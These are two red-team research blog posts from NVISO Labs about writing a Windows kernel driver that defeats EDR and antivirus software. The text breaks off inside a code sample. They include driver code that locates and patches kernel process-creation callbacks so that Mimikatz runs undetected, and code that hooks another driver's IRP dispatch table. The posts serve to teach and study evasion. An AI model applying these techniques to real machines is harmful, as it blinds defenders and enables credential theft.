NVISO Labs

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi32.dll,... and all the user processes and applications. When applications or processes need more advanced access to or control over hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll load a number, called the “system service number”, into the EAX register of the CPU and then execute the syscall instruction (on x64), which starts the transition to kernel mode and jumps to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.
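
The lookup itself boils down to indexing an array of function pointers. As a rough user-mode sketch (not real kernel code: the table, the service numbers and the two stand-in services are invented for illustration), the dispatcher can be modelled like this:

```cpp
#include <array>
#include <cassert>
#include <cstdint>

// Toy model of the system service dispatcher. It runs in user mode and never
// touches the real SSDT; the service numbers 0 and 1 are made up.
using SystemService = std::int32_t (*)(std::uint64_t arg);

static std::int32_t ToyNtClose(std::uint64_t) { return 0; }             // pretend status 0
static std::int32_t ToyNtReadVirtualMemory(std::uint64_t) { return 1; } // pretend status 1

// The "SSDT": function pointers indexed by system service number.
static const std::array<SystemService, 2> g_ToySsdt = { ToyNtClose, ToyNtReadVirtualMemory };

// What the dispatcher does with the number that was loaded into EAX.
std::int32_t ToyDispatch(std::uint32_t eax, std::uint64_t arg) {
    assert(eax < g_ToySsdt.size());   // this sketch simply refuses out-of-range numbers
    return g_ToySsdt[eax](arg);
}
```

Calling ToyDispatch(1, 0) ends up in ToyNtReadVirtualMemory purely because of its position in the table, which is also why replacing a table entry redirects every caller at once.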

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL) and win32k.sys, which mainly handles the User Interface (UI). The various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.) actually run in user mode on top of all this, but they’re less relevant in relation to EDRs/AVs.

In contrast to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can read or overwrite memory belonging to other drivers, or even the kernel itself. When this goes wrong and the driver crashes, the entire operating system crashes with it.

In 2005, with the first x64 edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Windows kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

[Figure: bugcheck]

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware: there is a separate class of drivers called Software Drivers.

[Figure: software driver]

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to an EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft put an end to patching the SSDT in x64 versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
[Figure: kernel callback]
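
The register-then-notify flow in the steps above can be modelled in a few lines of ordinary C++. This is only a user-mode sketch under stated assumptions: ToyKernel, its two methods and ToyEdrCallback are invented names, and the real callback array is an internal kernel structure with a different layout.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Signature of a toy process-creation callback (invented for this sketch).
using ToyProcessCallback = void (*)(int parentPid, int newPid);

struct ToyKernel {
    std::vector<ToyProcessCallback> callbackArray;

    // Steps 2-3: a driver hands one of its functions to the kernel,
    // which stores the address in the callback array.
    void RegisterCreateProcessCallback(ToyProcessCallback cb) {
        assert(cb != nullptr);
        callbackArray.push_back(cb);
    }

    // Steps 4-5: on process creation every registered routine is called.
    // Returns how many routines were notified.
    std::size_t NotifyProcessCreated(int parentPid, int newPid) const {
        for (ToyProcessCallback cb : callbackArray) {
            cb(parentPid, newPid);
        }
        return callbackArray.size();
    }
};

// Stand-in for the EDR/AV driver function (the "0xFA7F" of the list above).
int g_edrNotifications = 0;
void ToyEdrCallback(int /*parentPid*/, int /*newPid*/) { ++g_edrNotifications; }
```

Registering ToyEdrCallback once and then calling NotifyProcessCreated() bumps g_edrNotifications by one per created "process", which is the hook point an EDR/AV driver relies on.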

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straightforward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
[Figure: patch kernel callback]
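
To make the effect of the RET patch concrete, here is a minimal user-mode sketch. It assumes a callback can be modelled as a plain byte buffer and that "executing" it only means looking at the first opcode; ToyCallback and both helper functions are hypothetical, and no kernel memory is involved.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr std::uint8_t kOpcodeRet = 0xC3;   // x86/x64 near RET

// A callback routine modelled as raw code bytes (illustrative only).
struct ToyCallback {
    std::vector<std::uint8_t> code;
};

// "Runs" the callback: if the very first instruction is RET,
// the routine returns before it can inspect anything.
bool ToyCallbackInspects(const ToyCallback& cb) {
    assert(!cb.code.empty());
    return cb.code[0] != kOpcodeRet;
}

// The patch: overwrite the first byte with RET and hand back the
// original byte so the routine can be restored afterwards.
std::uint8_t ToyPatchWithRet(ToyCallback& cb) {
    assert(!cb.code.empty());
    const std::uint8_t original = cb.code[0];
    cb.code[0] = kOpcodeRet;
    return original;
}
```

Keeping the original byte around matters: writing it back re-enables the callback, which is how the AV product can be returned to its normal state after the test.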

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg:

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

[Figure: evil driver]
[Figure: windbg evil driver]

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

[Figure: bsod]

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

[Figure: PsSetCreateProcessNotifyRoutine]

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

[Figure: PspSetCreateProcessNotifyRoutine]

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

[Figure: callback array]

To view the different drivers in the callback array, we need to perform a bitwise AND operation on each entry in the callback array with the mask 0xFFFFFFFFFFFFFFF8, which clears the three lowest bits and leaves the actual pointer.

[Figure: logical and]
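
The masking step is a one-liner. The sketch below uses the mask from the text; the function name and the raw entry value are made up for illustration.

```cpp
#include <cstdint>

// Mask from the article: clears the three lowest bits of an array entry.
constexpr std::uint64_t kCallbackPointerMask = 0xFFFFFFFFFFFFFFF8ull;

// Strips the low bits, which are not part of the address, from a raw entry.
constexpr std::uint64_t DecodeCallbackEntry(std::uint64_t rawEntry) {
    return rawEntry & kCallbackPointerMask;
}

// Hypothetical raw entry: the trailing 0xF becomes 0x8 once bits 0-2 are cleared.
static_assert(DecodeCallbackEntry(0xFFFFB00112345ABFull) == 0xFFFFB00112345AB8ull,
              "low three bits are cleared");
```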

The driver roughly follows the same method to locate the callback array in memory: it calculates offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop through the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy the 4-byte displacement that follows the LEA r13 opcode bytes (0x4C 0x8D 0x2D)
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the absolute address of the callback array: address of the next instruction (i + 7) + displacement
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where the OPCODE_* arrays are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumber).
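
The "+ 5" and "+ 7" in FindPspCreateProcessNotifyRoutine() both come from the same rule: a RIP-relative displacement is added to the address of the next instruction. A minimal user-mode sketch of that arithmetic, assuming a little-endian host and using a helper name (ResolveRelativeTarget) that is not part of the driver:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Resolves an x64 instruction that ends in a signed 32-bit relative displacement.
//   code        : bytes of the function being scanned
//   codeSize    : number of valid bytes in `code`
//   codeAddress : address the first byte of `code` would have in memory
//   offset      : index of the instruction's first byte inside `code`
//   opcodeLen   : bytes before the displacement (1 for CALL E8, 3 for LEA 4C 8D 2D)
std::uint64_t ResolveRelativeTarget(const std::uint8_t* code, std::size_t codeSize,
                                    std::uint64_t codeAddress, std::size_t offset,
                                    std::size_t opcodeLen) {
    assert(code != nullptr);
    assert(offset + opcodeLen + sizeof(std::int32_t) <= codeSize);

    std::int32_t displacement = 0;
    std::memcpy(&displacement, code + offset + opcodeLen, sizeof(displacement));

    // Instruction length is opcodeLen + 4, i.e. 5 for CALL and 7 for this LEA.
    const std::uint64_t nextInstruction =
        codeAddress + offset + opcodeLen + sizeof(displacement);

    // A negative displacement wraps around correctly in unsigned arithmetic.
    return nextInstruction + static_cast<std::uint64_t>(static_cast<std::int64_t>(displacement));
}
```

For the bytes E8 B5 01 00 00 placed at address 0x1000 this yields 0x1000 + 5 + 0x1B5 = 0x11BA; a displacement of -7 on a 7-byte LEA points back at the instruction itself.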

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.
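
The 3 byte offset is easy to reproduce outside the kernel. In the sketch below the byte sequence is an invented routine (not a dump of the real PsSetCreateProcessNotifyRoutine()), chosen so that the CALL displacement contains zero bytes, and FindFirstOpcode() is a hypothetical helper that mirrors the driver's first search loop.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Returns the index of the first byte equal to `opcode` within the first
// `window` bytes of `code`, or -1 when no byte matches.
std::ptrdiff_t FindFirstOpcode(const std::uint8_t* code, std::size_t window, std::uint8_t opcode) {
    assert(code != nullptr);
    for (std::size_t i = 0; i < window; ++i) {
        if (code[i] == opcode) {
            return static_cast<std::ptrdiff_t>(i);
        }
    }
    return -1;
}

// Made-up routine: a short prologue followed by CALL rel32.
const std::uint8_t kToyRoutine[] = {
    0x48, 0x83, 0xEC, 0x28,         // sub rsp, 28h
    0x8A, 0xC2,                     // mov al, dl
    0x33, 0xD2,                     // xor edx, edx
    0xE8, 0xB5, 0x01, 0x00, 0x00,   // call +1B5h  (displacement bytes: B5 01 00 00)
    0x48, 0x83, 0xC4, 0x28,         // add rsp, 28h
    0xC3                            // ret
};
```

Searching kToyRoutine for 0xE8 finds the CALL at index 8, while searching for 0x00 lands on index 11, inside the displacement of that same CALL. The four bytes copied from there are then interpreted as an offset and point nowhere useful.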

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

[Figure: list callback array]

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 2 (Back to Basics)

29 October 2021 at 14:40

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with it. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is exposed through a symbolic link registered in the Object Manager’s GLOBAL?? directory (use Sysinternals’ WinObj tool to view the Object Manager). User mode applications can pass the symbolic link name to functions like NtCreateFile to obtain a handle, which they then use to talk to the driver.

[Figure: WinObj]

Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes alongside the DriverUnload operation which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);
NTSTATUS InterceptCreateClose(PDEVICE_OBJECT, PIRP);
NTSTATUS InterceptDeviceControl(PDEVICE_OBJECT, PIRP);

//DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;

    //...
}

The DriverObject->DriverUnload routine is responsible for cleaning up and preventing any memory leaks before the driver unloads. A leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver could not be opened or closed, so in a way the driver would be unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP destined for IRP_MJ_DEVICE_CONTROL carries two user buffers, one for input and one for output, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access) (((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:

#define IOCTL_INTERCEPTOR_HOOK_DRIVER CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_DRIVER CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_LIST_DRIVERS CTL_CODE(0x8000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_ALL_DRIVERS CTL_CODE(0x8000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)
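
To see what these definitions expand to, the same bit layout can be written as a constexpr function and checked at compile time without the WDK headers. ToyCtlCode and ToyFunctionFromCtlCode are names invented for this sketch; the two zero constants mirror the values of METHOD_BUFFERED and FILE_ANY_ACCESS.

```cpp
#include <cstdint>

// Same bit layout as the CTL_CODE macro:
// device type in bits 16-31, access in 14-15, function in 2-13, method in 0-1.
constexpr std::uint32_t ToyCtlCode(std::uint32_t deviceType, std::uint32_t function,
                                   std::uint32_t method, std::uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

constexpr std::uint32_t kMethodBuffered = 0;   // value of METHOD_BUFFERED
constexpr std::uint32_t kFileAnyAccess  = 0;   // value of FILE_ANY_ACCESS

constexpr std::uint32_t kIoctlHookDriver =
    ToyCtlCode(0x8000, 0x800, kMethodBuffered, kFileAnyAccess);
constexpr std::uint32_t kIoctlUnhookDriver =
    ToyCtlCode(0x8000, 0x801, kMethodBuffered, kFileAnyAccess);

static_assert(kIoctlHookDriver   == 0x80002000u, "0x8000 << 16 | 0x800 << 2");
static_assert(kIoctlUnhookDriver == 0x80002004u, "function number is shifted left by two bits");

// Extracts the 12-bit function number from a control code.
constexpr std::uint32_t ToyFunctionFromCtlCode(std::uint32_t code) {
    return (code >> 2) & 0xFFFu;
}
```

Because the function number sits in bits 2 to 13, consecutive function numbers produce control codes that are 4 apart, which is handy to know when spotting them in a debugger.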

3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

[Figure: hook MFA]

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which takes the driver’s object name (for example \Driver\Disk) and returns a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(
	&targetDriverName,
	OBJ_CASE_INSENSITIVE,
	nullptr,
	0,
	*IoDriverObjectType,
	KernelMode,
	nullptr,
	(PVOID*)&DriverObject
);

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;
}

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

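//MajorFunction holds IRP_MJ_MAXIMUM_FUNCTION + 1 entries, so the bound is inclusive (the array of saved pointers must be sized to match)
for (int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++) {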
    //save the original pointer in case we need to restore it later
	globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
	DriverObject->MajorFunction[i] = &GenericHook;
}
//cleanup
ObDereferenceObject(DriverObject);
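
The pointer swap can be tried out safely in user mode. The following is a toy model under stated assumptions: every Toy* type and function is invented, the "IRP" is reduced to a major function code plus a number, and only the constant 0x1b is taken from the real headers (the value of IRP_MJ_MAXIMUM_FUNCTION).

```cpp
#include <array>
#include <cassert>
#include <cstddef>

constexpr std::size_t kToyMaxMajorFunction = 0x1b;   // IRP_MJ_MAXIMUM_FUNCTION

struct ToyIrp {
    std::size_t majorFunction;   // which dispatch slot the request targets
    int payload;                 // stand-in for the request data
};
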